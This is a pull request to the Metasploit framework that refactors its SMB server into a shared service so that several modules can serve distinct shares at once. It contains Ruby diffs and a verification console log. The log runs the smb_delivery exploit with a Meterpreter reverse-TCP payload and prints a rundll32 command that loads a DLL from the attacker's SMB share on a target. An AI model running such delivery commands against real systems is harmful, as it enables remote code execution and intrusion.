### PR TITLE
Shared SMB Service

### DIFF
--- a/Gemfile
+++ b/Gemfile
@@ -52,3 +52,6 @@ group :test do
   # Manipulate Time.now in specs
   gem 'timecop'
 end
+
+# remove after https://github.com/rapid7/ruby_smb/pull/260 is landed
+gem 'ruby_smb', git: 'https://github.com/zeroSteiner/ruby_smb', branch: 'feat/server/remove-share'

--- a/Gemfile
+++ b/Gemfile
@@ -53,5 +53,3 @@ group :test do
   gem 'timecop'
 end
 
-# remove after https://github.com/rapid7/ruby_smb/pull/260 is landed
-gem 'ruby_smb', git: 'https://github.com/zeroSteiner/ruby_smb', branch: 'feat/server/remove-share'

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,15 +1,3 @@
-GIT
-  remote: https://github.com/zeroSteiner/ruby_smb
-  revision: feba8f6592c33c252c6b4e5dd576f2722ada6bf2
-  branch: feat/server/remove-share
-  specs:
-    ruby_smb (3.3.2)
-      bindata
-      openssl-ccm
-      openssl-cmac
-      rubyntlm
-      windows_error (>= 0.1.4)
-
 PATH
   remote: .
   specs:
@@ -485,6 +473,12 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
+    ruby_smb (3.3.2)
+      bindata
+      openssl-ccm
+      openssl-cmac
+      rubyntlm
+      windows_error (>= 0.1.4)
     rubyntlm (0.6.3)
     rubyzip (2.3.2)
     sawyer (0.9.2)
@@ -571,7 +565,6 @@ DEPENDENCIES
   rspec-rerun
   rubocop
   ruby-prof (= 1.4.2)
-  ruby_smb!
   simplecov (= 0.18.2)
   test-prof
   timecop

--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,3 +1,15 @@
+GIT
+  remote: https://github.com/zeroSteiner/ruby_smb
+  revision: feba8f6592c33c252c6b4e5dd576f2722ada6bf2
+  branch: feat/server/remove-share
+  specs:
+    ruby_smb (3.3.2)
+      bindata
+      openssl-ccm
+      openssl-cmac
+      rubyntlm
+      windows_error (>= 0.1.4)
+
 PATH
   remote: .
   specs:
@@ -473,12 +485,6 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.1)
-      bindata
-      openssl-ccm
-      openssl-cmac
-      rubyntlm
-      windows_error (>= 0.1.4)
     rubyntlm (0.6.3)
     rubyzip (2.3.2)
     sawyer (0.9.2)
@@ -565,6 +571,7 @@ DEPENDENCIES
   rspec-rerun
   rubocop
   ruby-prof (= 1.4.2)
+  ruby_smb!
   simplecov (= 0.18.2)
   test-prof
   timecop

--- a/lib/msf/core/exploit/remote/smb/server.rb
+++ b/lib/msf/core/exploit/remote/smb/server.rb
@@ -45,19 +45,6 @@ module Msf
       def on_client_connect(client)
         vprint_status("Received SMB connection from #{client.peerhost}")
       end
-
-      def cleanup_service
-        if service
-          begin
-            self.service.stop
-            self.service.wait
-            true
-          rescue ::Exception => e
-            print_error(e.message)
-            false
-          end
-        end
-      end
     end
   end
 end

--- a/lib/msf/core/exploit/remote/smb/server.rb
+++ b/lib/msf/core/exploit/remote/smb/server.rb
@@ -7,38 +7,6 @@ module Msf
       include ::Msf::Exploit::Remote::SocketServer
       include ::Msf::Exploit::Remote::SMB::LogAdapter
 
-      module ServiceMixin
-        def start
-          if Rex::Socket.is_ipv6?(@socket.localhost)
-            localinfo = "[#{@socket.localhost}]:#{@socket.localport}"
-          else
-            localinfo = "#{@socket.localhost}:#{@socket.localport}"
-          end
-
-          self.listener_thread = Rex::ThreadFactory.spawn("SMBServerListener(#{localinfo})", false) do
-            begin
-              run do |server_client|
-                on_client_connect_proc.call(server_client) if on_client_connect_proc
-                true
-              end
-            rescue IOError => e
-              # this 'IOError: stream closed in another thread' is expected, so disregard it
-              wlog("#{e.class}: #{e.message}")
-            end
-          end
-        end
-
-        def stop
-          @socket.close
-        end
-
-        def wait
-          listener_thread.join if listener_thread
-        end
-
-        attr_accessor :listener_thread, :on_client_connect_proc
-      end
-
       def initialize(info = {})
         super
 
@@ -49,40 +17,27 @@ module Msf
       end
 
       def start_service(opts = {})
-        @rsock = Rex::Socket::Tcp.create(
-          'LocalHost' => bindhost,
-          'LocalPort' => bindport,
-          'Comm' => _determine_server_comm(bindhost),
-          'Server' => true,
-          'Context' =>
-            {
-              'Msf' => framework,
-              'MsfExploit' => self
-            }
-        )
-
         unless opts[:logger]
           log_device = LogAdapter::LogDevice::Framework.new(framework)
           opts[:logger] = LogAdapter::Logger.new(self, log_device)
         end
 
-        thread_factory = Proc.new do |server_client, &block|
-          Rex::ThreadFactory.spawn("SMBServerClient(#{server_client.peerhost}->#{server_client.dispatcher.tcp_socket.localhost})", false, &block)
-        end
-
-        server = RubySMB::Server.new(
-          server_sock: @rsock,
+        self.service = Rex::ServiceManager.start(
+          Rex::Proto::SMB::Server,
+          (opts['ServerPort'] || bindport).to_i,
+          opts['ServerHost'] || bindhost,
+          {
+            'Msf'        => framework,
+            'MsfExploit' => self,
+          },
+          opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
           gss_provider: opts[:gss_provider],
-          logger: opts[:logger],
-          thread_factory: thread_factory
+          logger: opts[:logger]
         )
 
-        server.extend(ServiceMixin)
-        server.on_client_connect_proc = Proc.new { |client|
+        service.on_client_connect_proc = Proc.new { |client|
           on_client_connect(client)
         }
-        self.service = server
-        self.service.start
 
         print_status("Server is running. Listening on #{bindhost}:#{bindport}")
       end

--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -28,9 +28,9 @@ module Msf
         register_options(
           [
             OptPort.new('SRVPORT',    [ true, 'The local port to listen on.', 445 ]),
-            OptString.new('SHARE', [ false, 'Share (Default Random)']),
-            OptString.new('FILE_NAME', [ false, 'File name to share (Default Random)']),
-            OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default none)'])
+            OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
+            OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
+            OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])
           ], Msf::Exploit::Remote::SMB::Server::Share)
         register_advanced_options(
           [
@@ -58,12 +58,18 @@ module Msf
 
         super(opts)
 
-        virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(@share)
-        # the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
-        virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}".gsub(/\/|\\/, File::SEPARATOR)) do |client, _smb_session|
-          get_file_contents(client: client)
+        if share.present?
+          if service.shares.key?(share)
+            fail_with(Msf::Module::Failure::BadConfig, "The specified SMB share '#{share}' already exists.")
+          end
+
+          virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(share)
+          # the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
+          virtual_disk.add_dynamic_file("#{@folder_name}#{File::SEPARATOR}#{@file_name}".gsub(/\/|\\/, File::SEPARATOR)) do |client, _smb_session|
+            get_file_contents(client: client)
+          end
+          service.add_share(virtual_disk)
         end
-        service.add_share(virtual_disk)
       end
 
       # Setups the server configuration.
@@ -71,8 +77,8 @@ module Msf
         super
 
         self.folder_name = datastore['FOLDER_NAME']
-        self.share = datastore['SHARE'] || Rex::Text.rand_text_alpha(4 + rand(3))
-        self.file_name = datastore['FILE_NAME'] || Rex::Text.rand_text_alpha(4 + rand(3))
+        self.share = datastore['SHARE'].present? ? datastore['SHARE'] : Rex::Text.rand_text_alpha(4 + rand(3))
+        self.file_name = datastore['FILE_NAME'].present? ? datastore['FILE_NAME'] : Rex::Text.rand_text_alpha(4 + rand(3))
       end
 
       # Builds the UNC Name for the shared file
@@ -91,6 +97,12 @@ module Msf
       # @return [String] The file contents.
       def get_file_contents(client:)
         file_contents
+      end
+
+      def cleanup
+        self.service.remove_share(share) if share.present?
+
+        super
       end
     end
   end

--- a/lib/rex/proto/smb/server.rb
+++ b/lib/rex/proto/smb/server.rb
@@ -18,7 +18,7 @@ class Server
   include Proto
   extend Forwardable
 
-  def_delegators :@rubysmb_server, :add_share, :dialects, :guid, :shares
+  def_delegators :@rubysmb_server, :dialects, :guid, :shares, :add_share, :remove_share
 
   def initialize(port = 445, listen_host = '0.0.0.0', context = {}, comm = nil, gss_provider: nil, logger: nil)
     self.listen_host     = listen_host
@@ -97,10 +97,6 @@ class Server
 
   def wait
     @listener_thread.join if @listener_thread
-  end
-
-  def add_share(share_provider, *arg)
-
   end
 
   attr_accessor :context, :comm, :listener, :listen_host, :listen_port, :on_client_connect_proc

--- a/lib/rex/proto/smb/server.rb
+++ b/lib/rex/proto/smb/server.rb
@@ -9,8 +9,8 @@ module SMB
 
 ###
 #
-# Acts as an HTTP server, processing requests and dispatching them to
-# registered procs.  Some of this server was modeled after webrick.
+# Acts as an SMB server, processing requests and dispatching them to
+# registered procs.
 #
 ###
 class Server
@@ -32,16 +32,13 @@ class Server
     @rubysmb_server      = nil
   end
 
-  # More readable inspect that only shows the url and resources
   # @return [String]
   def inspect
-    resources_str = resources.keys.map{|r| r.inspect }.join ", "
-
     "#<#{self.class} smb://#{listen_host}:#{listen_port} >"
   end
 
   #
-  # Returns the hardcore alias for the HTTP service
+  # Returns the hardcore alias for the SMB service
   #
   def self.hardcore_alias(*args, **kwargs)
     gss_alias = ''

--- a/lib/rex/proto/smb/server.rb
+++ b/lib/rex/proto/smb/server.rb
@@ -1,0 +1,111 @@
+# -*- coding: binary -*-
+require 'forwardable'
+require 'rex/socket'
+
+
+module Rex
+module Proto
+module SMB
+
+###
+#
+# Acts as an HTTP server, processing requests and dispatching them to
+# registered procs.  Some of this server was modeled after webrick.
+#
+###
+class Server
+
+  include Proto
+  extend Forwardable
+
+  def_delegators :@rubysmb_server, :add_share, :dialects, :guid, :shares
+
+  def initialize(port = 445, listen_host = '0.0.0.0', context = {}, comm = nil, gss_provider: nil, logger: nil)
+    self.listen_host     = listen_host
+    self.listen_port     = port
+    self.context         = context
+    self.comm            = comm
+    @gss_provider        = gss_provider
+    @logger              = logger
+    self.listener        = nil
+    @listener_thread     = nil
+    @rubysmb_server      = nil
+  end
+
+  # More readable inspect that only shows the url and resources
+  # @return [String]
+  def inspect
+    resources_str = resources.keys.map{|r| r.inspect }.join ", "
+
+    "#<#{self.class} smb://#{listen_host}:#{listen_port} >"
+  end
+
+  #
+  # Returns the hardcore alias for the HTTP service
+  #
+  def self.hardcore_alias(*args, **kwargs)
+    gss_alias = ''
+    if (gss_provider = kwargs[:gss_provider])
+      gss_alias << "#{gss_provider.class}(allow_anonymous=#{gss_provider.allow_anonymous}, allow_guests=#{gss_provider.allow_guests}"
+      gss_alias << ", default_domain=#{gss_provider.default_domain}" if gss_provider.respond_to?(:default_domain)
+      gss_alias << ", ntlm_type3_status=#{gss_provider.ntlm_type3_status&.name}" if gss_provider.respond_to?(:ntlm_type3_status)
+      gss_alias << ')'
+    end
+    "#{(args[0] || '')}-#{(args[1] || '')}-#{args[3] || ''}-#{gss_alias}"
+  end
+
+  def alias
+    super || "SMB Server"
+  end
+
+  def start
+    self.listener = Rex::Socket::TcpServer.create(
+      'LocalHost'      => self.listen_host,
+      'LocalPort'      => self.listen_port,
+      'Context'        => self.context,
+      'Comm'           => self.comm
+    )
+
+    thread_factory = Proc.new do |server_client, &block|
+      Rex::ThreadFactory.spawn("SMBServerClient(#{server_client.peerhost}->#{server_client.dispatcher.tcp_socket.localhost})", false, &block)
+    end
+
+    @rubysmb_server = RubySMB::Server.new(
+      server_sock: self.listener,
+      gss_provider: @gss_provider,
+      logger: @logger,
+      thread_factory: thread_factory
+    )
+
+    localinfo = Rex::Socket.to_authority(self.listener.localhost, self.listener.localport)
+    @listener_thread = Rex::ThreadFactory.spawn("SMBServerListener(#{localinfo})", false) do
+      begin
+        @rubysmb_server.run do |server_client|
+          on_client_connect_proc.call(server_client) if on_client_connect_proc
+          true
+        end
+      rescue IOError => e
+        # this 'IOError: stream closed in another thread' is expected, so disregard it
+        wlog("#{e.class}: #{e.message}")
+      end
+    end
+  end
+
+  def stop
+    self.listener.close
+  end
+
+  def wait
+    @listener_thread.join if @listener_thread
+  end
+
+  def add_share(share_provider, *arg)
+
+  end
+
+  attr_accessor :context, :comm, :listener, :listen_host, :listen_port, :on_client_connect_proc
+end
+
+end
+end
+end

--- a/lib/rex/service_manager.rb
+++ b/lib/rex/service_manager.rb
@@ -59,7 +59,7 @@ class ServiceManager < Hash
       return inst
     end
 
-    inst = klass.new(*args)
+    inst = klass.new(*args, **kwargs)
     als  = inst.alias
 
     # Find an alias that isn't taken.

--- a/lib/rex/service_manager.rb
+++ b/lib/rex/service_manager.rb
@@ -20,15 +20,15 @@ class ServiceManager < Hash
   #
   # Calls the instance method to start a service.
   #
-  def self.start(klass, *args)
-    self.instance.start(klass, *args)
+  def self.start(klass, *args, **kwargs)
+    self.instance.start(klass, *args, **kwargs)
   end
 
   #
   # Calls the instance method to stop a service.
   #
-  def self.stop(klass, *args)
-    self.instance.stop(klass, *args)
+  def self.stop(klass, *args, **kwargs)
+    self.instance.stop(klass, *args, **kwargs)
   end
 
   #
@@ -48,9 +48,9 @@ class ServiceManager < Hash
   #
   # Starts a service and assigns it a unique name in the service hash.
   #
-  def start(klass, *args)
+  def start(klass, *args, **kwargs)
     # Get the hardcore alias.
-    hals = "#{klass}" + klass.hardcore_alias(*args)
+    hals = "#{klass}" + klass.hardcore_alias(*args, **kwargs)
 
     # Has a service already been constructed for this guy?  If so, increment
     # its reference count like it aint no thang.
@@ -93,8 +93,8 @@ class ServiceManager < Hash
   # what was originally passed to start exactly.  If the reference count of
   # the service drops to zero the service will be destroyed.
   #
-  def stop(klass, *args)
-    stop_service(hals[hardcore_alias(klass, *args)])
+  def stop(klass, *args, **kwargs)
+    stop_service(hals[hardcore_alias(klass, *args, **kwargs)])
   end
 
   #


### PR DESCRIPTION
This adds a service compatible with `Rex::ServiceManager` for SMB that can be shared among modules. There are currently 15 modules using the `Msf::Exploit::Remote::SMB::Server::Share` and this change will allow them all to be run concurrently. Once #18664 is landed, it also also allow multiple instances of that payload handler to be run as well. The only two modules that can *not* share the service are the `auxiliary/server/capture/smb` and `exploit/windows/smb/smb_relay` modules because they alter the authentication process. Because that authentication process is altered, shares can not actually be opened by clients for files to be read. Within the code, the limitation is implemented in the new service classes `.hardcore_alias` method by uniquely keying on the GSS provider.

For the remaining modules that are able to share the instance, it's assumed that they should register their own unique share and create whatever files within it that they need to. The `Msf::Exploit::Remote::SMB::Server::Share` will now raise an exception via `#fail_with` if the share that is to be added already exists because the module would be interfering with another. In this case, the user needs to set the `SHARE` datastore option to a new, unique value.

Something will need to be rebased depending on if this or #18664 is landed first. I'm happy to handle that in which ever order is easiest.

This requires the changes from rapid7/ruby_smb#260 to be implemented for cleaning up the service.

## Verification

- [ ] Start `msfconsole`
- [ ] Enable the manager commands by running `features set manager_commands true` and restarting msfconsole
- [ ] Run the `exploit/windows/smb/smb_delivery` module twice, taking care to set the `LPORT` (if necessary) and `SHARE` datastore options to unique values between runs
- [ ] Run the `_servicemanager` command to see an instance starting with `Rex::Proto::SMB::Server`
- [ ] Use `smbclient` or something else to verify that both shares were created (e.g. `smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"` assuming that `Share1` was one of the share names)
- [ ] Stop one of the jobs using `jobs -k #`, leaving the other running
- [ ] Use `smbclient` again to make sure that one share is still online while the other is gone
- [ ] Stop the last job
- [ ] Use `smbclient` again, but this time see that it fails with a connection error because the server was stopped due to the last reference being closed

## Example

```
msf6 exploit(windows/smb/smb_delivery) > _servicemanager
[*] No framework services are currently running.
msf6 exploit(windows/smb/smb_delivery) > run SHARE=Share1
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/smb_delivery) > 
[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\0.0.0.0\Share1\test.dll,0

msf6 exploit(windows/smb/smb_delivery) > run SHARE=Share2 LPORT=5555
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/smb_delivery) > 
[*] Started reverse TCP handler on 192.168.250.134:5555 
[*] Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\0.0.0.0\Share2\test.dll,0

msf6 exploit(windows/smb/smb_delivery) > _servicemanager
Services
========

 Id  Name                                                                                                                                                                                                                        References
 --  ----                                                                                                                                                                                                                        ----------
 0   Rex::Proto::SMB::Server445-0.0.0.0-Rex::Socket::Comm::Local-Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider(allow_anonymous=true, allow_guests=true, default_domain=WORKGROUP, ntlm_type3_status=)  3
 1   SMB Server                                                                                                                                                                                                                  3

msf6 exploit(windows/smb/smb_delivery) > smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"
[*] exec: smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"

  .                                   D        0  Mon Jan  8 16:00:40 2024
  test.dll                            N     9216  Mon Jan  8 16:03:20 2024
Error in dskattr: NT_STATUS_NOT_SUPPORTED
msf6 exploit(windows/smb/smb_delivery) > smbclient //192.168.159.128/Share2 -U smcintyre -N -c "dir *"
[*] exec: smbclient //192.168.159.128/Share2 -U smcintyre -N -c "dir *"

  .                                   D        0  Mon Jan  8 16:02:22 2024
  test.dll                            N     9216  Mon Jan  8 16:03:26 2024
Error in dskattr: NT_STATUS_NOT_SUPPORTED
msf6 exploit(windows/smb/smb_delivery) > jobs

Jobs
====

  Id  Name                               Payload                          Payload opts
  --  ----                               -------                          ------------
  0   Exploit: windows/smb/smb_delivery  windows/meterpreter/reverse_tcp  tcp://192.168.250.134:4444
  1   Exploit: windows/smb/smb_delivery  windows/meterpreter/reverse_tcp  tcp://192.168.250.134:5555

msf6 exploit(windows/smb/smb_delivery) > jobs -k 0
[*] Stopping the following job(s): 0
[*] Stopping job 0
msf6 exploit(windows/smb/smb_delivery) > smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"
[*] exec: smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"

tree connect failed: NT_STATUS_BAD_NETWORK_NAME
msf6 exploit(windows/smb/smb_delivery) > smbclient //192.168.159.128/Share2 -U smcintyre -N -c "dir *"
[*] exec: smbclient //192.168.159.128/Share2 -U smcintyre -N -c "dir *"

  .                                   D        0  Mon Jan  8 16:02:22 2024
  test.dll                            N     9216  Mon Jan  8 16:03:37 2024
Error in dskattr: NT_STATUS_NOT_SUPPORTED
msf6 exploit(windows/smb/smb_delivery) > jobs -k 1
[*] Stopping the following job(s): 1
[*] Stopping job 1

[*] Server stopped.
msf6 exploit(windows/smb/smb_delivery) > smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"
[*] exec: smbclient //192.168.159.128/Share1 -U smcintyre -N -c "dir *"

do_connect: Connection to 192.168.159.128 failed (Error NT_STATUS_CONNECTION_REFUSED)
msf6 exploit(windows/smb/smb_delivery) > _servicemanager 
[*] No framework services are currently running.
msf6 exploit(windows/smb/smb_delivery) >
```